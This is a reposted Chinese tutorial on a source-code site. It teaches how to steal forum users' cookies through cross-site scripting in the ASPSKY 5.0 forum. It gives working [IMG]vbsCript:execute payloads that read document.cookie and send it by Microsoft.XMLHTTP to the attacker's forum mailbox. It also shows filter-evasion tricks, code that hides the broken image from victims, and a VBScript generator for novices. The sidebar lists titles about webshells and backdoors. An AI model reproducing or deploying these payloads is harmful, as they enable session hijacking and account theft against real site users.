中文源码网
欢迎您!
会员登录
会员注册
发布自媒体
发布模版
发布源码
发布模版
发布酷站
推荐源码
常用源码
帮助中心
栏目导航
热门搜索:
网站首页
免费源码
精品源码
html模版
精品模版
酷站大全
技术文档
方案大全
网络教程
站长自媒体
新闻动态
帮助中心
免费源码下载
asp源码
php源码
python源码
.net源码
jsp源码
JS特效
安卓源码
IOS源码
微信小程序下载
毕业设计源码下载
模版下载
商城模版
手机wap模版
网络教程
html5教程
asp教程
php教程
jsp教程
Python语言技术文档
python入门
Python编程技巧
Python网站web
Python网络爬虫
Python自动化运维
数据挖掘/机器学习
Python人工智能
Python多媒体
Python科学计算
Python游戏开发
Python图形界面
Python数据库相关
Python与其他语言
Python库/模块大全
Python报错处理大全
微信小程序技术文档
微信小程序开发入门
微信小程序开发技巧
微信游戏开发
微信公众号开发
微信常用源码
php语言技术文档
php入门教程
php技巧
php函数/类库
php框架
php+AJAX技巧
开源系统及二次开发
PHP内核
jsp语言技术文档
jsp入门教程
jsp技巧
jsp框架
asp语言技术文档
asp入门教程
asp技巧
asp函数/类库
C#/.NET语言技术文档
C#/.NET入门教程
C#/.NET技巧
MVC/.NET框架
C#/.NET微信开发
程序报错解决方法
html5/css技术文档
html5
CSS
javascript
javascript技巧
jquery
json
ajax
js框架/js库
点击排行
总结PHP中初始化空数组的最佳方法
在PHP中输出JS语句以及乱码问题的解决方案
原生PHP实现导出csv格式Excel文件的方法示例【附源码下载】
用PHP的反射实现委托模式的讲解
详解提高使用Java反射的效率方法
详解关于php的xdebug配置(编辑器vscode)
详解php中生成标准uuid(guid)的方法
详解php中curl返回false的解决办法
详解php用static方法的原因
详解php伪造Referer请求反盗链资源
详解PHP素材图片上传、下载功能
详解PHP实现支付宝小程序用户授权的工具类
详解PHP神奇又有用的Trait
详解PHP队列的实现
详解PHP的抽象类和抽象方法以及接口总结
您现在的位置:
首页
>
技术文档
>
asp技巧
我要投稿
利用Microsoft.XMLHTTP控件发送COOKIE
来源:
中文源码网
浏览:180 次 日期:2024-05-01 16:59:38
【下载文档:
利用Microsoft.XMLHTTP控件发送COOKIE.txt
】
利用Microsoft.XMLHTTP控件发送COOKIE
作者:czy
出处:http://www.nsfocus.net 日期:2003-09-03 (注意由于论坛会对文章中的一些字符作处理,所以最好到 http://www.chinansl.com/czy/xmlhttp.txt看文章 http://www.chinansl.com/czy/aspsky5.htm测试代码) 跨站脚本攻击想必各位都已经是很熟悉了,但是得到COOKIE的时候一直有一个 问题:总是要用WINDOW.OPEN弹一个窗体出来然后发送COOKIE,这样隐秘性 就大打折扣了。以前我想了一个在网页中用insertAdjacentHTML方法来注入HTML语句 的办法勉强可以作到发送COOKIE不出现IE窗口,但是在实际使用中有时会遇到IE出错。 没有更好的办法了吗?以前在研究VBS病毒自动升级的时候用到一个Microsoft.XMLHTTP 控件(该控件是WIN98/2K上都默认自带的东东,并且它是IE认为safe的控件!),通过它我们 可以在网页中给网站发送http请求,可以是POST也可以是GET. 好了思路已经到这儿来,下面我们可以实战一下,我以ASPSKY 5.0 0320为例子。 我们知道
在SRC中可以写入vbscript:这样的语句。。比如
,但是我们只能执行一个语句,比如
这样都将是错误的! 怎么办法呢?在VBS中我们可以用EXECUTE语句,在JS中我们可以使用EVAL语! 比如:
或是
还没有晕吧?上面你可能会注意到用VBS的execute语句时双引号要换为"这是因为: 在VBS中单引号要括起字符串,必须是两个单引号代表一个又引号,并且在双引号内! 所以在execute语句中我们不能用单引号,而直接用"呢,在HTML进行引号匹配的时候 会和src="后的引号匹配,所以我们只能用"代替了。 引号的问题解决了,在实际应用中ASPSKY还会对我们的代码进行处理: 1:如果发现script字串,会在前面加上一个空格 2:如果发现http字串会认为是一个URL,并在两边加上
元素 3:如果发现空格会用 代替 解决问题: 1:vbscript用vbsCript代替 2:http用,""ht""+""tp...代替(vbs中引号括引号里面的应用多一对,+代表连接符) 3:空格用 代替(注不是) 在最后就是发送COOKIE的问题: 1:控件在本地可以GET,POST任意的网站,但是在网页中竟然只能 GET,POST当前服务器。。。。要不然IE就会说拒绝仿问! 2:cookie中不能有&等在URL中有特殊交意的字符 解决问题: 1:只能发给当前服务器,那么可以把COOKIE发到你在论坛上的注册的用户的邮箱嘛:) 2:replace(document.cookie,""&"",""-""),在vbs中用 replace替换函用,在例子中我把"&"换成了"-" 问题都解决了下面是实际的例子: 动网aspsky 5.0 0320测试成功 //---------------------- [IMG]vbsCript:execute("dat=replace(document.cookie,""&"",""-""):set http=createobject(""Microsoft.XMLHTTP""):http.open ""GET"",""ht""+""tp://www.hd315.gov.cn/gcs/19qu/yanqing/bbs/usersms.asp?action=send&touser=czy&title=news&submit=发送&message=""&dat,false:http.send")[/IMG] 说明:把COOKIE发给CZY用户,邮件标题叫news //---------------------- 另控件的正常用法: 让代码更完美,现在COOKIE已经乖乖的在我们的邮箱里了,但是有一个小问题由于图片不 能正常的显示会是一个小叉,旁边还有按此在新窗口浏览图片的提示。。。这又难免会让人 生疑。 解决思路: 一个网页中的所有IMG元素通过document.imanges都能例举到,并且可以设置它们的大小,当width=0时就 相当于HIDDEN了.通过比较元素的src属性的值是否含有"ript"就可以判断是不是我们的图片.另外比较时 大于符用>代替,0用0代替! 代码: [IMG]vbsCript:execute("for each aa in document.images:if instr(aa.src,""ript"")>0 then:aa.width=0:end if:next")[/IMG] 实际应用的代码: [IMG]vbsCript:execute("for each aa in document.images:if instr(aa.src,""ript"")>0 then:aa.width=0:end if:next:dat=replace(document.cookie,""&"",""-""):set http=createobject(""Microsoft.XMLHTTP""):http.open ""GET"",""ht""+""tp://www.hd315.gov.cn/gcs/19qu/yanqing/bbs/usersms.asp?action=send&touser=czy&title=alll&submit=发送&message=""&dat,false:http.send")[/IMG] //-------------------方便菜鸟使用:)
sub changeq()
if form1.loc.value="" or form1.who.value="" then
msgbox "没有加入地址或用户名?"
exit sub
end if
loc=form1.loc.value
user=form1.who.value
str="[IMG]vbsCript:execute("for each aa in document.images:if instr(aa.src,""ript"")>0 then:aa.width=0:end if:next:dat=replace(document.cookie,""&"",""-""):set http=createobject(""Microsoft.XMLHTTP""):http.open ""GET"",""ht""+""tp://"&loc&"/usersms.asp?action=send&touser="&user&"&title=news&submit=发送&message=""&dat,false:http.send")[/IMG]"
form1.area.value=str
end sub
ASPSKY 5.0 0320 COOKI搜集器--CZY
设置发送地址:
▲发送地址形如:www.nnit30.com/newbbs(newbbs是网站中论坛的安装目录最后不用加/,也不要http://头)
发送的用户名:-------------
生成的代码:)
[Ctrl+A 全选 注:如需引入外部Js需刷新才能执行]
上一篇:
利用MSXML2.XmlHttp和Adodb.Stream采集图片
下一篇:
利用FSO取得图像文件信息
相关内容
•
15种asp技巧
•
6行代码实现无组件上传(author_stimson)
•
[教程+分享]具有良好体验度的Web注册系统
•
做了CDN加速的asp网站获取用户真实IP程序
•
最简洁的asp多重查询的解决方案
•
邹建的分页存储过程改了一下
•
字符批量替换程序asp服务器版
•
转换中文为unicode_转换unicode到正常文本
•
重置TSYS系统中的所有"生成的文件"成"未生成文件"
•
值得收藏的一些HTML、JavaScript、asp代码
•
支持权重的无组件asp广告显示代码
•
支持加号空格的查询
•
整理了一个editplus的剪辑文件(asp方面的内容)
•
整理了下手动注入脚本命令[带注释]
•
站长感慨asp编程究竟何去何从__font_color=red_原创__font_
•
怎样判断一个盘上是否有文件
•
怎样读取一个文本文件的内容_
•
在不刷新页面的情况下调用远程asp脚本
•
在Z-BLOG可用的新版asp的GIF验证码[V70404]
•
在Vista_IIS_7_中用_vs2005_调试_Web_项目的注意事项
•
在JScript中使用缓存技术的实际代码
•
在asp应用程序中限制重复提交同一表单
•
在asp里面创建GUID
•
在asp处理程序时显示进度
•
在asp程序中取得表单所有内容的代码
•
在asp编程中使用数组
•
在asp编程中nothing代表什么意思_
•
远程图片自动按文件夹上传到服务器-默飞出品
•
原来asp和PHP都是可以删除自身的
•
雨哲浅谈关于防采集而不影响收录内容篇
•
雨哲防采集策略之列表篇
•
有效防止asp木马上传运行—小知识[网络安全技术]
•
由给定的字符串生成关键字
•
用正则和xmlHttp实现的asp小偷程序
•
用实现asp批量删除目录及文件的代码
•
用存储过程、GetRows()、抽取10万条数据的速度测试
•
用XMLHTTP来偷东西哈!
•
用XMLHTTP很好的一个例子
•
用xmlhttp编写web采集程序
•
用XML+FSO+JS实现服务器端文件的选择效果
•
用XML+FSO+JS实现服务器端文件的
•
用sql设置access的默认值
•
用SQL批量插入数据的存储过程
•
用QuickWAP组件结合asp建设Wap站点第1_2页
•
用js实现QQ在线查询功能
•
用javascript解决外部数据抓取中的乱码问题
•
用javascript编写asp应用--第一课--通览
•
用JAVASCRIPT帮我写个计数器
•
用GetString提高asp的速度
•
用FSO获得图片文件的信息(大小,宽,高)
•
用cookies实现闪电登录论坛方法
•
用asp做一个TOP_COOL的站内搜索
•
用asp做的DNS_LOOKUP程序
•
用asp应用程序实现自己的UrlDeCode
•
用asp隐藏文件路径,实现防盗链_的代码
•
用asp写组件
•
用asp实现在线压缩与解压缩功能代码
•
用asp实现远程批量文件改名
•
用asp实现远程将文件批量改名的代码
•
用asp实现写IIS日志的代码
•
用asp实现无组件生成验证码的方法2种
•
用asp实现文件浏览、上传、下载的程序
•
用asp实现网页邮箱访问的方法
•
用asp实现网页调用doc附Response.ContentType_详细列表
•
用asp实现批量删除bak文件
•
用asp实现距指定日期的倒记时程序源码
•
用asp实现检测文件编码
•
用asp实现分级权限控制
•
用asp实现多线程
•
用asp实现对MP3曲目信息的操作
•
用asp实现读取文件的最后一行的代码
•
用asp实现的截取指定格式字符串的代码
•
用asp实现的获取文件夹中文件的个数的代码
•
用asp实现的代码批量修改程序,fso相关
•
用asp实现的iframe批量替换工具
•
用asp实现把文件打包成Xml文件包,带解包的asp工具附下载
•
用asp实现MSSQL用户密码破解
•
用asp生成UTF-8网页文件的两种方法
•
用asp设计购物推车
•
用asp如何实现防止网页频繁刷新?
•
用asp脚本实现限制IP访问
•
用asp获取微软安全更新列表的代码_小偷程序
•
用asp和SQL实现基于Web的事件日历
•
用asp读取XML文件的具体方法与示例
•
用asp打开远端MDB文件的方法
•
用asp创建日志文件(附源程序)
•
用asp创建MDaemon用户的代码
•
用asp+XML打造留言本
•
用asp+xmlhttp编写web采集程序
•
用asp+DLL实现WEB方式修改服务器时间
•
用asp_VBS_xmlhttp_adodbstream下载和保存图片的代码
•
隐藏修改文件时间和文件属性的asp脚本
•
隐藏asp木马后门的两种方法
•
隐蔽的asp后门_大家可以查看下
•
以前写的一个分页存储过程,刚才不小心翻出来的
•
一些值得一看的代码asp
•
一些关于asp_购物车的想法
•
一些asp技巧和实用解决方法
•
一想千开PJblog审核功能补丁_v2.0版_发布第1_3页
•
一搜图片搜索小偷
•
一款不错的asp木马_黑色界面
•
一句话木马连接客户端
•
一句话_asp木马加密版_彻底突破杀毒软件
•
一个实用的FSO-实时统计在线人数
•
一个强健_实用的asp+ajax二级联动菜单(有演示和附源程序打包下载)
•
一个较新的asp后门服务端实现代码
•
一个简单的HTML病毒分析
•
一个防止被采集的方法
•
一个查asp木马的小东东
•
一个不太让人讨厌的自动弹出窗口
•
一个sql查询器,自动画表格填字段
•
一个asp中的数组
•
一个asp小马
•
一份asp内存的释放的实验报告
•
一段几乎可以让你死机的JS代码
•
一段采集程序代码
•
一段asp防注入的通用脚本
•
一段asp的HTTP_REFERER判断代码
•
一段asp单页显示文件夹下所有图片的代码
•
一段asp_伪静态代码
QQ客服
公众号
手机版
帮助中心